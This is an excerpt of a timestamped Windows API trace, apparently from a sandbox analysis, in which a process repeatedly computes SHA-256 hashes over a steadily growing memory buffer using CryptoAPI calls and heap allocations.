	[0153.525] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0153.525] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305d70
	[0153.525] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305d70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305d70, pdwDataLen=0x128aac) returned 1
	[0153.525] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.526] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.526] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.526] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.526] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0153.526] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305d98
	[0153.526] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305d98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305d98, pdwDataLen=0x128aac) returned 1
	[0153.526] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.526] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.526] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.527] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.527] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0153.527] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305dc0
	[0153.527] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305dc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305dc0, pdwDataLen=0x128aac) returned 1
	[0153.527] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.527] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.527] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.527] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.527] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0153.527] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305de8
	[0153.527] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305de8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305de8, pdwDataLen=0x128aac) returned 1
	[0153.527] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.527] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.527] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.528] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.528] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0153.528] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305e10
	[0153.528] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305e10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305e10, pdwDataLen=0x128aac) returned 1
	[0153.528] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.528] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.528] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.528] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.528] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0153.528] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305e38
	[0153.528] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305e38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305e38, pdwDataLen=0x128aac) returned 1
	[0153.528] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.528] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.528] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.529] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.529] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0153.529] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305e60
	[0153.529] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305e60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305e60, pdwDataLen=0x128aac) returned 1
	[0153.529] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.529] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.529] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.529] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.529] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0153.529] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305e88
	[0153.529] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305e88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305e88, pdwDataLen=0x128aac) returned 1
	[0153.529] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.529] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.529] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.530] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.530] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0153.530] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305eb0
	[0153.530] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305eb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305eb0, pdwDataLen=0x128aac) returned 1
	[0153.530] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.530] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.530] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.530] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.530] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0153.530] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305ed8
	[0153.531] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305ed8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305ed8, pdwDataLen=0x128aac) returned 1
	[0153.531] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.531] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.531] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.531] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.531] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0153.531] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305f00
	[0153.531] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305f00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305f00, pdwDataLen=0x128aac) returned 1
	[0153.531] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.531] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.531] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.532] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.532] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0153.532] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305f28
	[0153.532] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305f28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305f28, pdwDataLen=0x128aac) returned 1
	[0153.532] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.532] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.532] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.532] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.532] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0153.532] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305f50
	[0153.532] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305f50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305f50, pdwDataLen=0x128aac) returned 1
	[0153.532] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.532] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.532] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.533] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.533] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0153.533] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305f78
	[0153.533] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305f78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305f78, pdwDataLen=0x128aac) returned 1
	[0153.533] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.533] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.533] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.533] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.533] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0153.533] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.533] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305fa0
	[0153.533] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305fa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305fa0, pdwDataLen=0x128aac) returned 1
	[0153.533] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.533] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.533] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.534] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.534] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0153.534] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306000
	[0153.534] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306000, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306000, pdwDataLen=0x128aac) returned 1
	[0153.534] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.534] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.534] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.534] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.534] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0153.534] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.534] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306028
	[0153.534] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306028, pdwDataLen=0x128aac) returned 1
	[0153.534] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.535] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.535] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.535] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.535] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0153.535] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.535] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306050
	[0153.535] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306050, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306050, pdwDataLen=0x128aac) returned 1
	[0153.535] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.535] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.535] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.535] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.536] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0153.536] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306078
	[0153.536] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306078, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306078, pdwDataLen=0x128aac) returned 1
	[0153.536] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.536] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.536] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.536] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.536] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0153.536] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.536] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23060a0
	[0153.536] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23060a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23060a0, pdwDataLen=0x128aac) returned 1
	[0153.536] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.537] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.537] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.537] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.537] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0153.537] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.537] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23060c8
	[0153.537] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23060c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23060c8, pdwDataLen=0x128aac) returned 1
	[0153.537] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.537] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.537] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.537] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.538] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0153.538] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23060f0
	[0153.538] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23060f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23060f0, pdwDataLen=0x128aac) returned 1
	[0153.538] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.538] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.538] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.538] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.538] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0153.538] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.538] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306118
	[0153.538] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306118, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306118, pdwDataLen=0x128aac) returned 1
	[0153.538] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.538] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.538] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.539] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.539] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0153.539] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306140
	[0153.539] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2306140, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306140, pdwDataLen=0x128aac) returned 1
	[0153.539] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.539] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.539] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.539] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.539] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0153.539] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306168
	[0153.539] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2306168, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2306168, pdwDataLen=0x128aac) returned 1
	[0153.539] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.539] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.539] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.540] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.540] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0153.540] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306190
